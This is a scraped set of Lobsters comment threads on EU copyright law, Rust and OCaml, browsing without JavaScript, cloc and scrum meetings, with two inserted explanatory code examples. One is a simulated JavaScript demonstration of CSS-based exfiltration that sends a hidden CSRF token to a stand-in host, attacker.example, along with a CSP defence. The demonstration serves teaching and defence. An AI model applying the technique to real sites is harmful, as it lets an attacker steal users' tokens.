                                                                                                                                  How is that any different from what @pushcx said? As the owner/operator of lobste.rs he would have to abide by this law and produce, or buy access to some sort of copyrighted work database in order to test for it for all content that is created on lobsters.

                                                                                                                                  That’s not going to make it easy for startups. That’s not going to make it easy for privately owned, independent side projects. That’s just going to hurt.

                                                                                                                                  1. 2

                                                                                                                                    ALSO, you’d better not quote any part of my message if you reply, because I could, apparently, legitimately sue lobsters for not enforcing my copyright. e.g. there’s no such thing as fair use anymore.

                                                                                                                                    (yes, that’s a stretch, but that seems to be the basic threat)

                                                                                                                                    1. 1

                                                                                                                                      I replied before @pushcx and yes, it seems we agree on how bad it is :)

                                                                                                                                      1. 2

                                                                                                                                        Blargh! I am sorry. I misread the thread and thought you were replying to pushcx.

                                                                                                                              3. 6

                                                                                                                                Or Lobsters gets a fine when you submit a link to any European news site.

                                                                                                                                1. 1

                                                                                                                                  What’s worse is that people will devise a way to signal what content is linkable and what is only linkable with a license. This will limit quality news dissemination and strengthen the position of fake news. This will help to kill the EU. Sad, right?

                                                                                                                                2. 1

                                                                                                                                  Most probably Lobsters will not be able to post most of the links.

                                                                                                                                1. 7

                                                                                                                                  I don’t understand why OP didn’t actually progress from the “evaluating Rust based on online documentation” stage to the “trying to implement a solution in Rust” stage. The exact issue being looked at, responding to certain OS signals, is entirely trivial due to this crate, which came up with a simple DDG search.

                                                                                                                                  If the language has the problem that people are fighting with the language in order to become productive with it, perhaps something is wrong with the language, and not the programmers?

                                                                                                                                  This misses the point. Rust is opinionated about how code should handle sharing access to data, and about when data should be shared rather than copied. It has been observed that people often take time to adjust to this, which is noted in the docs. I don’t see why that’s an issue.

                                                                                                                                  1. 9

                                                                                                                                    I don’t understand why OP didn’t actually progress from the “evaluating Rust based on online documentation” stage to the “trying to implement a solution in Rust” stage.

                                                                                                                                    Author provided a solution in Rust…did you not read the whole article?

                                                                                                                                    1. 3

                                                                                                                                      He did somewhat superficial research on what libraries or crates could be used though.

                                                                                                                                      It is the same with ocaml/reason actually: he complains about the lack of a build system but the vast majority of packages are now using dune/jbuilder, which is trivial to learn and use, well documented and extremely powerful, and he does not even mention it. He picks Containers as a standard library replacement but it seems unclear to me if he has even evaluated base or core for example (even if I like containers myself). He also mentions the introduction of multicore as something present even though it is not yet part of the runtime.

                                                                                                                                      1. 8

                                                                                                                                        somewhat superficial research

                                                                                                                                        I think that’s pretty realistic for almost anyone in the same situation though. If I’m trying to decide between 3 or 4 different languages for a task that needed to be done yesterday, how much time do I really have to learn all the nuances of the ecosystem?

                                                                                                                                        So, yeah, complain that he didn’t know about X, or didn’t know about Y… But, really, if you are a member of the Z community for which X and Y are relevant, instead of complaining that people missed this well known tool, help make sure that a newcomer’s first introduction to Z informs them of X and Y. That’d be super helpful.

                                                                                                                                        1. 1

                                                                                                                                          I agree with you, but I think the three communities mentioned above are doing their best to make sure that this is the case.

                                                                                                                                          And about the reason/ocaml stuff, what I mention appears in most reason tutorials, almost every package and any recent blog or forum thread, and there are dozens of discussions on the current lack of multicore, so I still believe the research was superficial.

                                                                                                                                          This said, I wasn’t claiming that the post is bad per se, I have found it quite interesting and I agree that the current situation is not bad but still suboptimal. I was actually pleasantly surprised to see that he did actually implement some quite non trivial example code in all those, and even contributed to pony!

                                                                                                                                          EDIT: updated twice to try and clarify my complaints

                                                                                                                                      2. 2

                                                                                                                                        Your question confused me for quite a while, as I was unable to find this Rust solution in the article, despite multiple reloads. The page looks like this to me: https://leotindall.com/static/noRustVersion.png

                                                                                                                                        Eventually, I looked at it on my mobile phone where, mysteriously, there is a code snippet. I was baffled until I realized that, indeed, the only difference between my mobile device and my laptop is… I have JavaScript disabled in my browser on my laptop.

                                                                                                                                        So, my apologies to OP on this one. I was unfair. On the other hand, this serves as a great cautionary tale: make sure your site works without JavaScript.

                                                                                                                                        1. 2

                                                                                                                                          make sure your site works without JavaScript.

                                                                                                                                          Why draw the line at Javascript?

                                                                                                                                          1. 1

                                                                                                                                            Not him, so I can only answer for myself.

                                                                                                                                            JavaScript is Turing complete, so it can do everything and can communicate results outside my control, so I want the ability to stop that.

                                                                                                                                            CSS is also Turing complete, but AFAIK it can’t communicate outside without JavaScript, and unlike JavaScript it’s really hard to make it do something crazy like mine Bitcoin (which with JavaScript is very easy to do).

                                                                                                                                            1. 7

                                                                                                                                              Now I want to write a Bitcoin miner in pure-CSS.

                                                                                                                                              CSS is also Turing complete, but AFAIK it can’t communicate outside without JavaScript

                                                                                                                                              Enter: CSS Exfil and friends.
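The CSS-only leak this comment points at, as an added example that is not part of the thread and not code from the CSS Exfil write-up: attribute-prefix selectors (`input[value^="ab"]`) fire only when the attribute starts with that prefix, and a `background-image` on the matching rule makes the browser request an attacker-chosen URL, so one rule per candidate character leaks a value one character per round. The collector URL, the victim element and the page origin are constructed for the demonstration; the "browser" is a small simulator, so nothing touches the network, and the CSP check at the end is a deliberately simplified parser rather than a real policy engine.

```javascript
// Added example (not from the thread or the CSS Exfil research): data leaking
// through a stylesheet with no JavaScript. A selector such as
// input[value^="ab"] matches only when the attribute starts with "ab"; giving
// the matching rule a background-image makes the browser fetch a URL the
// attacker chose. One rule per candidate next character leaks the value one
// character per round. The "browser" here is a tiny simulator; no network.

const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789';
const ENDPOINT = 'https://attacker.example/leak'; // hypothetical collector URL

// One rule per candidate next character, extending a prefix the attacker
// already knows. For a given value at most one of these rules can match.
function buildExfilRules(selector, attr, knownPrefix, endpoint, alphabet = ALPHABET) {
  return Array.from(alphabet, (ch) => {
    const prefix = knownPrefix + ch;
    const url = `${endpoint}?p=${encodeURIComponent(prefix)}`;
    return {
      attr,
      prefix,
      url,
      css: `${selector}[${attr}^="${prefix}"] { background-image: url("${url}"); }`,
    };
  });
}

// Stand-in for the browser: evaluate only [attr^="..."] against one element
// and report the background-image URLs that would be fetched. The value has to
// be in the markup (a hidden CSRF token, an id, ...): text a user types into a
// field does not update its value attribute, so it cannot leak this way.
function simulateFetches(element, rules) {
  return rules
    .filter((r) => typeof element.attrs[r.attr] === 'string'
                && element.attrs[r.attr].startsWith(r.prefix))
    .map((r) => r.url);
}

// Attacker side: each round injects the rules for the current prefix, waits
// for one request, and extends the prefix by the character that request encodes.
function recoverAttribute(element, selector, attr, endpoint, maxLen = 64) {
  let known = '';
  while (known.length < maxLen) {
    const fetched = simulateFetches(element, buildExfilRules(selector, attr, known, endpoint));
    if (fetched.length === 0) break; // value complete, or next char is outside ALPHABET
    known = new URL(fetched[0]).searchParams.get('p');
  }
  return known;
}

// Defence: the leak rides on an image request, so a Content-Security-Policy
// whose img-src omits the attacker's origin blocks it (and a strict style-src
// keeps the injected stylesheet from loading at all). Simplified parser: only
// 'self' and full origins are understood, no schemes, wildcards or paths.
function imgSrcAllows(cspHeader, requestUrl, pageOrigin) {
  const directive = cspHeader.split(';').map((d) => d.trim())
    .find((d) => d.split(/\s+/)[0] === 'img-src');
  if (!directive) return true; // no img-src directive (default-src fallback ignored here)
  const sources = directive.split(/\s+/).slice(1);
  const origin = new URL(requestUrl).origin;
  return sources.some((s) => (s === "'self'" ? origin === pageOrigin : s === origin));
}

// Constructed victim page state: a hidden anti-CSRF token present in the HTML.
const victim = { tag: 'input', attrs: { type: 'hidden', name: 'csrf', value: 'a1b2' } };
const SELECTOR = 'input[name="csrf"]';

const leaked = recoverAttribute(victim, SELECTOR, 'value', ENDPOINT);
console.log('token recovered with CSS only:', leaked); // a1b2
const firstRule = buildExfilRules(SELECTOR, 'value', '', ENDPOINT)[0];
console.log('blocked by img-src \'self\':',
  !imgSrcAllows("default-src 'self'; img-src 'self'", firstRule.url, 'https://victim.example'));
```

The loop stops when no candidate rule fires, which happens both when the whole value has been read and when the next character is outside the alphabet the attacker guessed; a real attacker widens the alphabet, a defender removes the image request by policy or, better, keeps untrusted CSS off the page in the first place.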

                                                                                                                                              1. 1

                                                                                                                                                Good lord.

                                                                                                                                            2. 1

                                                                                                                                              You’re right, I should revise that statement: make sure your site works without requiring me to allow you to execute arbitrary code just to read an article you wrote.

                                                                                                                                              To be clear, there is an obvious tradeoff here: syntax highlight on the server side is annoying. My blog solves this by having an acceptable no-JS fallback that is less pretty but is not missing content.

                                                                                                                                            3. 1

                                                                                                                                              That sure would be confusing! It looks like the author embedded a gist, rather than using Medium’s code tool. I assume you can embed code in Medium without JavaScript….

                                                                                                                                        1. 8

                                                                                                                                          All of the times I’ve upgraded my personal computer in the last two decades have been because my web browser, of all things, got slow to the point of annoyance. Didn’t need better graphics, a bigger disk, or more RAM for VMs at all. Just faster browsing.

                                                                                                                                          I don’t know how much I trust this “cloc” tool, though. I’ve used it a few times and found it to sometimes be wildly inaccurate. (I mean, even considering what a generally useless metric “lines of code” is anyway.) For example, I’m going to be quite surprised if either Chrome or Firefox has any Visual Basic, C Shell, Tcl/Tk, or Pascal in them.

                                                                                                                                          Or, if they do, it would be more interesting to know what those files are for.

                                                                                                                                          1. 3

                                                                                                                                            My guess is that the dependencies are bundled in the repo, and they have all the other stuff that seems out of place.

                                                                                                                                            1. 1

                                                                                                                                              Also, cloc just guesses based on file extension. I have a project I check with it which has a bunch of intermediate .d clang build files, and if I don’t clean those out first it thinks I’m writing loads of D. But otherwise, in terms of actual counting and speed, cloc seems pretty good for me anyway.
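
The extension-only guessing described in the comment above, as an added example that is not cloc's own code and not from anyone in the thread: a tiny line counter that first classifies files by extension (using a small assumed extension table, not cloc's real one) and then adds a content check that recognises a clang/gcc `-MD` dependency file, which is Make rule syntax, so it stops being counted as D source. The sample files are constructed inline.

```python
"""Extension-based language guessing versus a content check.

Added example, not cloc's code.  EXT_TO_LANG is an assumed subset of the kind
of table cloc keeps; SAMPLE_FILES are constructed, not from a real repo.
"""
import os
import re

# Assumed extension table in the style cloc uses (a subset, not cloc's real one).
EXT_TO_LANG = {
    ".c": "C",
    ".cpp": "C++",
    ".h": "C/C++ Header",
    ".d": "D",          # the collision: D source *and* compiler dependency files
    ".py": "Python",
}

# A compiler -MD/-MMD dependency file is a Make rule: "target.o: dep1 dep2 \".
# D source has no such line, so this is a cheap way to tell the two apart.
MAKE_DEP_RULE = re.compile(r"^\S+\.(o|obj|d)\s*:", re.MULTILINE)
D_SOURCE_HINT = re.compile(r"^\s*(module|import)\s+[\w.]+\s*;", re.MULTILINE)


def guess_by_extension(path, _text=None):
    """What an extension-only tool does: look up the suffix and nothing else."""
    ext = os.path.splitext(path)[1].lower()
    return EXT_TO_LANG.get(ext, "Unknown")


def guess_with_content(path, text):
    """Same lookup, but a .d file that reads like a Make rule is reclassified."""
    lang = guess_by_extension(path)
    if lang == "D" and MAKE_DEP_RULE.search(text) and not D_SOURCE_HINT.search(text):
        return "Make dependency"
    return lang


def count_lines(files, classify):
    """Non-blank line totals per language, using the supplied classifier.

    `files` maps path -> file contents; `classify(path, text)` returns a label.
    """
    totals = {}
    for path, text in files.items():
        lang = classify(path, text)
        nonblank = sum(1 for line in text.splitlines() if line.strip())
        totals[lang] = totals.get(lang, 0) + nonblank
    return totals


# Constructed sample tree: one C file, one clang -MD output, one real D file.
SAMPLE_FILES = {
    "src/main.c": "#include <stdio.h>\nint main(void) {\n    return 0;\n}\n",
    "build/main.d": (
        "build/main.o: src/main.c include/util.h \\\n"
        "  include/log.h\n"
        "include/util.h:\n"
        "include/log.h:\n"
    ),
    "lib/hello.d": "module hello;\nimport std.stdio;\nvoid main() {\n    writeln(\"hi\");\n}\n",
}


if __name__ == "__main__":
    print("by extension:  ", count_lines(SAMPLE_FILES, guess_by_extension))
    print("with content:  ", count_lines(SAMPLE_FILES, guess_with_content))
```

Run stand-alone, the first line attributes the four lines of the `-MD` output to D along with the five lines of real D source; the second separates them. The content check is deliberately narrow (a Make-style rule and no `module`/`import` statement), which is the trade-off any such heuristic makes: it fixes the one collision the comment describes without trying to guess every ambiguous suffix.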

                                                                                                                                          1. 0

                                                                                                                                            Don’t treat them like a status meeting. They are meant to be a mini sprint planner. They are for replanning the sprint daily. See “Daily Scrum” in http://www.scrumbook.org/

                                                                                                                                            1. 1

                                                                                                                                              How do you “replan the sprint” without understanding the status of open tasks?

                                                                                                                                              Basically, your current status is the input to replanning—are you done with that task that was planned to take 3 days after only 1 day? Better pull something else into the sprint!

                                                                                                                                              1. 0

                                                                                                                                                You are correct that status is important for planning. I agree, and I didn’t say status isn’t involved or isn’t important; I was just pointing out that it isn’t the goal of the meeting. As I said, they are not status meetings but planning meetings.
